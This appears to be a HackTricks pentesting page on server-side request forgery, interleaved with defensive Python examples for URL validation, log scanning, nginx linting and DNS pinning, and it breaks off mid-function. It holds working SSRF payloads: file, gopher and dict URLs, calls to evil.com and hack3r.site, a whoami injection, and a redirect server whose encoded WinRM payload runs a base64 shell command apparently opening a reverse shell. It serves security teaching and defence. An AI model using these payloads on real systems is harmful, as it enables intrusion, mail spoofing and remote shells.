hacktricks/pentesting-web/ssrf-server-side-request-forgery/README.md
2023-08-03 19:12:22 +00:00


# SSRF (Server Side Request Forgery)



Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing. (From here.)

## Capture SSRF

The first thing you need to do is capture an SSRF interaction generated by you. To capture an HTTP or DNS interaction you can use tools such as:

## Bypass whitelisted domains

Usually you will find that the SSRF only works in certain whitelisted domains or URLs. The following page contains a compilation of techniques for trying to bypass that whitelist:

{% content-ref url="url-format-bypass.md" %} url-format-bypass.md {% endcontent-ref %}

### Bypass via open redirect

If the server is correctly protected, you could still bypass all the restrictions by exploiting an open redirect inside the web page. Because the web page allows SSRF to its own domain and will probably follow redirects, you can use the open redirect to make the server access any internal resource.
Read more here: https://portswigger.net/web-security/ssrf
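The defensive counterpart of the two bypasses above is a fetcher that validates every destination and re-validates every redirect hop instead of letting the HTTP client auto-follow. The following is an added example, not HackTricks code: the resolver and the single-request function are injectable, and the DNS table and redirect chain are constructed so the logic runs offline.

```python
"""Outbound-URL validation for a server-side fetcher (added example).

Enforces an http/https scheme allowlist, resolves the host and rejects any
non-public address, and re-validates each redirect hop by hand. The resolver
and the one-request `fetch` function are injectable; FAKE_DNS and
SAMPLE_RESPONSES below are constructed data for illustration.
"""
import ipaddress
import socket
from urllib.parse import urljoin, urlsplit

ALLOWED_SCHEMES = {"http", "https"}
REDIRECT_STATUSES = {301, 302, 303, 307, 308}
MAX_REDIRECTS = 3


def is_public_ip(addr: str) -> bool:
    """True only for globally routable unicast addresses.

    Rejects loopback, RFC 1918, link-local (which covers 169.254.169.254),
    CGNAT, multicast and reserved ranges; IPv4-mapped IPv6 is unwrapped so
    ::ffff:127.0.0.1 is judged as 127.0.0.1. Unparsable strings are never trusted.
    """
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return ip.is_global and not ip.is_multicast


def resolve_host(host: str, resolve=socket.getaddrinfo) -> list[str]:
    """Every address the name resolves to; a single bad answer fails the check."""
    return sorted({info[4][0] for info in resolve(host, None)})


def check_destination(url: str, resolve=socket.getaddrinfo) -> tuple[bool, str]:
    """Decide whether the fetcher may connect to `url` at all."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo in URL not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        addrs = resolve_host(host, resolve)
    except OSError as exc:  # socket.gaierror is an OSError
        return False, f"resolution of {host} failed: {exc}"
    bad = [a for a in addrs if not is_public_ip(a)]
    if not addrs or bad:
        return False, f"{host} resolves to non-public address(es) {bad or addrs}"
    return True, "ok"


def fetch_checked(url: str, fetch, resolve=socket.getaddrinfo) -> tuple[bool, str]:
    """Follow redirects manually, validating each hop.

    `fetch(url)` performs ONE request without following redirects and returns
    (status, location_header_or_None). Client-side auto-follow is exactly what
    the open-redirect bypass relies on, so it is never used here.
    """
    current = url
    for _ in range(MAX_REDIRECTS + 1):
        ok, reason = check_destination(current, resolve)
        if not ok:
            return False, f"blocked {current}: {reason}"
        status, location = fetch(current)
        if status not in REDIRECT_STATUSES or location is None:
            return True, current
        current = urljoin(current, location)  # Location may be relative
    return False, "too many redirects"


# ---- constructed sample data so the logic can be exercised offline -------
FAKE_DNS = {"api.example.com": ["93.184.216.34"], "intranet.example.com": ["10.0.0.5"]}


def fake_resolve(host, port=None):
    """Stand-in for socket.getaddrinfo backed by the constructed table above."""
    try:
        ipaddress.ip_address(host)
        addrs = [host]
    except ValueError:
        if host not in FAKE_DNS:
            raise socket.gaierror(f"constructed resolver: unknown host {host}")
        addrs = FAKE_DNS[host]
    return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", (a, 0)) for a in addrs]


SAMPLE_RESPONSES = {  # an open redirect on the allowed host aimed at the metadata service
    "https://api.example.com/redirect": (302, "http://169.254.169.254/latest/meta-data/"),
    "https://api.example.com/relative": (302, "/v1/status"),
}


def fake_fetch(url):
    return SAMPLE_RESPONSES.get(url, (200, None))


if __name__ == "__main__":
    for u in ["https://api.example.com/redirect", "https://api.example.com/relative",
              "http://intranet.example.com/", "gopher://127.0.0.1:25/_x"]:
        print(u, "->", fetch_checked(u, fake_fetch, fake_resolve))
```

Checking every resolved address (not just the first) matters because a name can return a mix of public and private records; and because the check happens per hop, the first request to the allowlisted host succeeds while its redirect to the link-local metadata address is refused.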

## Protocols

### file://

```
file:///etc/passwd
```

### dict://

The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:

```
dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
ssrf.php?url=dict://attacker:11111/
```

### SFTP://

A network protocol used for secure file transfer over secure shell.

```
ssrf.php?url=sftp://evil.com:11111/
```

### TFTP://

Trivial File Transfer Protocol, works over UDP.

```
ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET
```

### LDAP://

Lightweight Directory Access Protocol. It is an application protocol used over an IP network to manage and access the distributed directory information service.

```
ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
```

### Gopher://

With this protocol you can specify the IP, port and bytes you want the server to send. Then, you can basically exploit an SSRF to communicate with any TCP server (but you need to know how to talk to the service first).
Fortunately, you can use Gopherus to create payloads for several services. Additionally, remote-method-guesser can be used to create gopher payloads for Java RMI services.

### Gopher smtp

```
ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
```

will make a request like

```
HELO localhost
MAIL FROM:<hacker@site.com>
RCPT TO:<victim@site.com>
DATA
From: [Hacker] <hacker@site.com>
To: <victime@site.com>
Date: Tue, 15 Sep 2017 17:20:26 -0400
Subject: AH AH AH

You didn't say the magic word !


.
QUIT
```

Note that the line breaks are double-encoded (`%250d%250a`): the application decodes the parameter once, so the gopher client receives `%0d%0a` and sends the CRLF that SMTP expects.

### Gopher HTTP

Gopher is a document-retrieval protocol from the early days of the Internet that has largely been replaced by HTTP, but some server-side HTTP clients still support it. In an SSRF context it serves as a transport: the bytes after the item-type character in the URL are sent to the target port verbatim, so a gopher URL can carry a complete request to an internal service that the vulnerable server delivers on your behalf.

To perform a gopher SSRF attack:

  1. Identify the SSRF vulnerability in the target application.
  2. Craft a gopher URL pointing at the desired resource, in the form gopher://<attacker-controlled-IP>:<attacker-controlled-port>/.
  3. Send the crafted gopher URL as a request to the server.
  4. Analyze the server's response to determine whether the attack succeeded.

Gopher SSRF does not work everywhere: many HTTP client libraries have disabled or restricted gopher support, and success depends on the server's implementation and the security measures in place.

To mitigate the risk of gopher SSRF attacks:

  • Implement proper input validation and sanitization to prevent SSRF vulnerabilities.
  • Disable or restrict gopher support on servers that do not require it.
  • Regularly update and patch server software to address known vulnerabilities.

```
#For new lines you can use %0A, %0D%0A
gopher://<server>:8080/_GET / HTTP/1.0%0A%0A
gopher://<server>:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body
```
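On the detection side, the protocol payloads in this section (dict, sftp, tftp, ldap, gopher, file) all leave a recognizable trace in the request log: a URL parameter whose scheme is not http(s), encoded line breaks, double percent-encoding, or a loopback/link-local host. The scanner below is an added example, not HackTricks code; the access log lines are constructed (some reuse payload shapes from this page) and `scan_log` is the entry point.

```python
"""Access-log scan for SSRF-style URL parameters (added example).

Decodes each query parameter repeatedly (the gopher SMTP payload above uses
%250d%250a, which only becomes CRLF after a second decode) and flags non-http
schemes, CRLF, double-encoding, curl-style brace globbing and non-public host
literals. SAMPLE_LOG is constructed data.
"""
import ipaddress
import re
from urllib.parse import parse_qsl, unquote, urlsplit

SAMPLE_LOG = """\
10.0.0.7 - - [03/Aug/2023:19:12:22 +0000] "GET /ssrf.php?url=http://cdn.example.com/img.png HTTP/1.1" 200 512
10.0.0.7 - - [03/Aug/2023:19:12:23 +0000] "GET /ssrf.php?url=dict://127.0.0.1:11211/ HTTP/1.1" 200 0
10.0.0.7 - - [03/Aug/2023:19:12:24 +0000] "GET /ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM HTTP/1.1" 200 0
10.0.0.7 - - [03/Aug/2023:19:12:25 +0000] "GET /fetch?u=file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt} HTTP/1.1" 200 0
10.0.0.7 - - [03/Aug/2023:19:12:26 +0000] "GET /fetch?u=http://169.254.169.254/latest/meta-data/ HTTP/1.1" 200 0
10.0.0.7 - - [03/Aug/2023:19:12:27 +0000] "GET /index.html HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|PATCH|HEAD) (?P<target>\S+) HTTP/')
SCHEME_RE = re.compile(r"^\s*([A-Za-z][A-Za-z0-9+.-]*):")
SAFE_SCHEMES = {"http", "https"}


def decode_repeatedly(value: str, rounds: int = 3) -> str:
    """Undo up to `rounds` layers of percent-encoding."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_non_public_host(host: str) -> bool:
    """Flag loopback/private/link-local/multicast literals and the name 'localhost'."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return host.lower() == "localhost"
    return not ip.is_global or ip.is_multicast


def inspect_param(name: str, value: str):
    """`value` is what the application sees after its own single URL-decode."""
    decoded = decode_repeatedly(value)
    reasons = []
    m = SCHEME_RE.match(decoded)
    scheme = m.group(1).lower() if m else None
    if scheme and scheme not in SAFE_SCHEMES:
        reasons.append("non-http-scheme")
    if unquote(value) != value:          # encoding survived the framework's decode
        reasons.append("double-encoded")
    if "\r" in decoded or "\n" in decoded:
        reasons.append("crlf")
    if "{" in decoded and "}" in decoded:  # curl URL globbing
        reasons.append("glob-braces")
    host = urlsplit(decoded).hostname if scheme else None
    if host and is_non_public_host(host):
        reasons.append("non-public-host")
    if not reasons:
        return None
    return {"param": name, "scheme": scheme, "reasons": reasons}


def scan_log(text: str) -> list:
    """One finding per suspicious parameter, tagged with its 1-based line number."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        # parse_qsl performs the single decode a web framework would do
        for name, value in parse_qsl(query, keep_blank_values=True):
            finding = inspect_param(name, value)
            if finding:
                finding["line"] = line_no
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The `double-encoded` flag is the useful one for gopher/SMTP payloads: a legitimate URL parameter rarely still contains `%xx` sequences after the framework has decoded it once. Hostnames that are not IP literals would need resolution before they can be judged, which is why only literals and `localhost` are flagged here.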

### Gopher SMTP — reverse connect to 1337

{% code title="redirect.php" %}
```php
<?php
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
?>
```
{% endcode %}

Now query it:

```
https://example.com/?q=http://evil.com/redirect.php
```

### SMTP

https://twitter.com/har1sec/status/1182255952055164929

  1. Connect with the SSRF to smtp on localhost:25
  2. Get the internal domain name from the first line: 220 http://blabla.internaldomain.com ESMTP Sendmail
  3. Search github for http://internaldomain.com and find subdomains
  4. Connect

### Curl URL globbing - WAF bypass

If the SSRF is executed by curl, curl has a feature called URL globbing that could be useful to bypass WAFs. For example, in this writeup you can find an example of path traversal via the file protocol:

```
file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt}
```

## Capture SSRF request

### SSRF via Referrer header

Some applications employ server-side analytics software that tracks visitors. This software often logs the Referrer header in requests, since this is of particular interest for tracking incoming links. Often the analytics software will actually visit any third-party URL that appears in the Referrer header. This is typically done to analyze the contents of referring sites, including the anchor text used in the incoming links. As a result, the Referer header often represents a fruitful attack surface for SSRF vulnerabilities.
To discover this kind of "hidden" vulnerability you can use the Burp plugin "Collaborator Everywhere".

## SSRF via SNI data from certificate

The simplest misconfiguration that would allow you to connect to an arbitrary backend would look something like this:

```nginx
stream {
    server {
        listen 443;
        resolver 127.0.0.11;
        proxy_pass $ssl_preread_server_name:443;
        ssl_preread on;
    }
}
```

Here the value of the SNI field is used directly as the address of the backend.

With this insecure configuration we can exploit the SSRF vulnerability just by specifying the desired IP or domain name in the SNI field. For example, the following command would force Nginx to connect to _internal.host.com_:

```bash
openssl s_client -connect target.com:443 -servername "internal.host.com" -crlf
```
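The fix for this misconfiguration is to never feed `$ssl_preread_server_name` into `proxy_pass` directly but to route through a `map` that lists the permitted SNI names and sends everything else to a dead end. The lint below is an added example, not HackTricks or nginx code: it reads `stream {}` configs as text and reports a `proxy_pass` built from a client-controlled variable unless that variable comes from a `map` with an explicit `default`. The three configs are constructed; the first reproduces the vulnerable snippet above, the second is the hardened form, and the `127.0.0.1:9` sink assumes nothing listens on that port so unknown names are refused.

```python
"""Lint for nginx stream proxy_pass driven by SNI (added example)."""
import re

UNSAFE_CONF = """\
stream {
    server {
        listen 443;
        resolver 127.0.0.11;
        proxy_pass $ssl_preread_server_name:443;
        ssl_preread on;
    }
}
"""

SAFE_CONF = """\
stream {
    # SNI name -> fixed backend; anything not listed goes to a closed port.
    map $ssl_preread_server_name $backend {
        default          127.0.0.1:9;
        app.example.com  10.0.0.5:443;
        api.example.com  10.0.0.6:443;
    }
    server {
        listen 443;
        proxy_pass $backend;
        ssl_preread on;
    }
}
"""

NO_DEFAULT_CONF = """\
stream {
    map $ssl_preread_server_name $backend {
        app.example.com  10.0.0.5:443;
    }
    server {
        listen 443;
        proxy_pass $backend;
        ssl_preread on;
    }
}
"""

# Variables of ngx_stream_ssl_preread_module whose value the TLS client chooses.
CLIENT_CONTROLLED = {"$ssl_preread_server_name", "$ssl_preread_protocol",
                     "$ssl_preread_alpn_protocols"}
PROXY_PASS_RE = re.compile(r"proxy_pass\s+([^;]+);")
MAP_RE = re.compile(r"\bmap\s+(\$\w+)\s+(\$\w+)\s*\{([^}]*)\}")
VAR_RE = re.compile(r"\$\w+")


def audit_stream_config(text: str) -> list:
    """Return one message per risky proxy_pass; an empty list means no finding."""
    # map target variable -> (source variable, map body)
    maps = {m.group(2): (m.group(1), m.group(3)) for m in MAP_RE.finditer(text)}
    findings = []
    for m in PROXY_PASS_RE.finditer(text):
        target = m.group(1).strip()
        for var in VAR_RE.findall(target):
            if var in CLIENT_CONTROLLED:
                findings.append(
                    f"proxy_pass {target!r}: {var} is client-controlled and used as the upstream")
            elif var in maps:
                source, body = maps[var]
                if not re.search(r"^\s*default\s", body, re.M):
                    findings.append(
                        f"map for {var} (from {source}) has no default; unknown names fall through")
            else:
                findings.append(f"proxy_pass {target!r}: {var} is not derived from an allowlist map")
    return findings


if __name__ == "__main__":
    for name, conf in [("unsafe", UNSAFE_CONF), ("safe", SAFE_CONF), ("no-default", NO_DEFAULT_CONF)]:
        print(name, "->", audit_stream_config(conf) or "ok")
```

A `map` without `default` yields an empty upstream for unknown names, which nginx refuses anyway, but making the fallthrough explicit keeps the fail-closed behaviour visible to the next person editing the file; the lint therefore reports it separately from the direct-use case.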

## Upload files with Wget

## SSRF with Command Injection

It might be worth trying a payload like:

```
url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami`
```

## PDF rendering

If the web page automatically creates a PDF with some information you have provided, you can insert some JS that will be executed by the PDF creator itself (the server) while creating the PDF, and you will be able to abuse an SSRF. Find more information here.

## From SSRF to DoS

Create several sessions and try to download heavy files exploiting the SSRF from the sessions.

## SSRF PHP functions

{% content-ref url="../../network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md" %} php-ssrf.md {% endcontent-ref %}

## SSRF redirect to Gopher

For some exploitations you might need to send a redirect response (probably to use a different protocol like gopher). Here you have different Python codes to respond with a redirect:

```python
# First run: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl

class MainHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        print("GET")
        self.send_response(301)
        self.send_header("Location", "gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20%31%30%2e%31%30%2e%31%31%2e%31%31%37%3a%35%39%38%36%0d%0a%55%73%65%72%2d%41%67%65%6e%74%3a%20%70%79%74%68%6f%6e%2d%72%65%71%75%65%73%74%73%2f%32%2e%32%35%2e%31%0d%0a%41%63%63%65%70%74%2d%45%6e%63%6f%64%69%6e%67%3a%20%67%7a%69%70%2c%20%64%65%66%6c%61%74%65%0d%0a%41%63%63%65%70%74%3a%20%2a%2f%2a%0d%0a%43%6f%6e%6e%65%63%74%69%6f%6e%3a%20%63%6c%6f%73%65%0d%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%61%70%70%6c%69%63%61%74%69%6f%6e%2f%73%6f%61%70%2b%78%6d%6c%3b%63%68%61%72%73%65%74%3d%55%54%46%2d%38%0d%0a%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%20%31%37%32%38%0d%0a%0d%0a%3c%73%3a%45%6e%76%65%6c%6f%70%65%20%78%6d%6c%6e%73%3a%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%33%2f%30%35%2f%73%6f%61%70%2d%65%6e%76%65%6c%6f%70%65%22%20%78%6d%6c%6e%73%3a%61%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%22%20%78%6d%6c%6e%73%3a%68%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%69%6e%64%6f%77%73%2f%73%68%65%6c%6c%22%20%78%6d%6c%6e%73%3a%6e%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%39%2f%65%6e%75%6d%65%72%61%74%69%6f%6e%22%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%77%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%78%73%69%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%31%2f%58%4d%4c%53%63%68%65%6d%61%22%3e%0a%20%20%20%3c%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%20%20%20%3c%61%3a%54%6f%3e%48%54%54%50%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%31%3a%35%39%38%36%2f%77%73%6d%61%6e%2f%3c%2f%61%3a%54%6f%3e%0a%20%20%20%20%20%20%3c%77%3a%52%65%73%6f%75%72%63%65%55%52%49%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%3c%2f%77%3a%52%65%73%6f%75%72%63%65%55%52%49%3e%0a%20%20%20%20%20%20%3c%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%20%20%20%3c%61%3a%41%64%64%72%65%73%73%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%2f%72%6f%6c%65%2f%61%6e%6f%6e%79%6d%6f%75%73%3c%2f%61%3a%41%64%64%72%65%73%73%3e%0a%20%20%20%20%20%20%3c%2f%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%3c%61%3a%41%63%74%69%6f%6e%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%2f%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%3c%2f%61%3a%41%63%74%69%6f%6e%3e%0a%20%20%20%20%20%20%3c%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%31%30%32%34%30%30%3c%2f%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%3e%0a%20%20%20%20%20%20%3c%61%3a%4d%65%73%73%61%67%65%49%44%3e%75%75%69%64%3a%30%41%42%35%38%30%38%37%2d%43%32%43%33%2d%30%30%30%35%2d%30%30%30%30%2d%30%30%30%30%30%30%30%31%30%30%30%30%3c%2f%61%3a%4d%65%73%73%61%67%65%49%44%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%50%54%31%4d%33%30%53%3c%2f%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%77%3a%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%70%3a%44%61%74%61%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%74%69%6f%6e%53%65%74%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%20%4e%61%6d%65%3d%22%5f%5f%63%69%6d%6e%61%6d%65%73%70%61%63%65%22%3e%72%6f%6f%74%2f%73%63%78%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%3e%0a%20%20%20%20%20%20%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%3c%2f%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%3c%73%3a%42%6f%64%79%3e%0a%20%20%20%20%20%20%3c%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%22%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%63%6f%6d%6d%61%6e%64%3e%65%63%68%6f%20%2d%6e%20%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%43%34%78%4d%43%34%78%4e%43%34%78%4d%53%38%35%4d%44%41%78%49%44%41%2b%4a%6a%45%3d%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%3c%2f%70%3a%63%6f%6d%6d%61%6e%64%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%74%69%6d%65%6f%75%74%3e%30%3c%2f%70%3a%74%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%2f%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%3e%0a%20%20%20%3c%2f%73%3a%42%6f%64%79%3e%0a%3c%2f%73%3a%45%6e%76%65%6c%6f%70%65%3e%0a")
        self.end_headers()

httpd = HTTPServer(('0.0.0.0', 443), MainHandler)
# ssl.wrap_socket() was removed in Python 3.12; wrap the listening socket with an SSLContext instead
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile="server.pem")
httpd.socket = context.wrap_socket(httpd.socket, server_side=True)
httpd.serve_forever()
```

The same redirect served with Flask:

```python
from flask import Flask, redirect

app = Flask(__name__)

@app.route('/')
def root():
    return redirect('gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20', code=301)

if __name__ == "__main__":
    # 'adhoc' generates a self-signed certificate on the fly (requires the cryptography package)
    app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
```


## DNS Rebinding CORS/SOP bypass

If you are having problems exfiltrating content from a local IP because of CORS/SOP, DNS Rebinding can be used to bypass that limitation:

{% content-ref url="../cors-bypass.md" %} cors-bypass.md {% endcontent-ref %}

### Automated DNS Rebinding

Singularity of Origin is a tool to perform DNS rebinding attacks. It includes the components necessary to rebind the IP address of the attack server's DNS name to the target machine's IP address and to serve attack payloads for exploiting vulnerable software on the target machine.

Check out also the publicly running server at http://rebind.it/singularity.html

## DNS Rebinding + TLS Session ID/Session ticket

Requirements:

  • SSRF
  • Outbound TLS sessions
  • Stuff on local ports

Attack:

  1. Ask the user/bot to access a domain controlled by the attacker
  2. The TTL of the DNS is 0 sec (so the victim will check the IP of the domain again soon)
  3. A TLS connection is created between the victim and the attacker's domain. The attacker introduces the payload inside the Session ID or Session Ticket.
  4. The domain will start an infinite loop of redirects to itself. The goal is to make the user/bot access the domain until it performs another DNS request for the domain.
  5. In that DNS request a private IP address is now given (127.0.0.1 for example)
  6. The user/bot will try to re-establish the TLS connection and, to do so, it will send the Session ID/Ticket ID (which contains the attacker's payload). Congratulations, you asked the user/bot to attack itself.

Note that during this attack, if you want to attack localhost:11211 (memcache) you need to make the victim establish the initial connection with www.attacker.com:11211 (the port must always be the same).
To perform this attack you can use the tool: https://github.com/jmdx/TLS-poison/
For more information take a look at the talk where this attack is explained: https://www.youtube.com/watch?v=qGpAJxfADjo&ab_channel=DEFCONConference
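Both rebinding variants above depend on the victim resolving the name twice and trusting the second answer. The added example below (not HackTricks code) shows the vulnerable resolve-validate-resolve-connect pattern beside the hardened resolve-once-and-pin pattern, with the attacker's TTL-0 DNS server replaced by a constructed `RebindingResolver` and the network connector injected so it runs offline.

```python
"""Resolve-once DNS pinning against rebinding (added example).

A fetcher that resolves a name to validate it and then lets its HTTP library
resolve the same name again when connecting gives a TTL-0 rebinding server two
chances to answer differently. The hardened version resolves once, validates
every answer, and connects to that pinned address while still presenting the
original name as SNI/Host. RebindingResolver is a constructed stand-in.
"""
import ipaddress
import socket
import ssl


class RebindingResolver:
    """Answers a public address on the first lookup and loopback afterwards."""

    def __init__(self, first="93.184.216.34", later="127.0.0.1"):
        self.first, self.later = first, later
        self.lookups = 0

    def __call__(self, host, port=None):
        addr = self.first if self.lookups == 0 else self.later
        self.lookups += 1
        return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", (addr, port or 0))]


def is_public_ip(addr: str) -> bool:
    """Globally routable unicast only; IPv4-mapped IPv6 is unwrapped first."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return ip.is_global and not ip.is_multicast


def tls_connect_pinned(ip: str, port: int, host: str, timeout: float = 5.0) -> ssl.SSLSocket:
    """Real connector: TCP to the pinned IP, certificate validated against `host`."""
    sock = socket.create_connection((ip, port), timeout=timeout)
    ctx = ssl.create_default_context()
    return ctx.wrap_socket(sock, server_hostname=host)


def naive_connect(host, port, resolve=socket.getaddrinfo, connect=tls_connect_pinned):
    """Vulnerable pattern: validate via one lookup, then connect via another."""
    for info in resolve(host, port):
        if not is_public_ip(info[4][0]):
            raise ValueError(f"{host} resolves to non-public {info[4][0]}")
    # what an HTTP client does internally when handed the hostname again:
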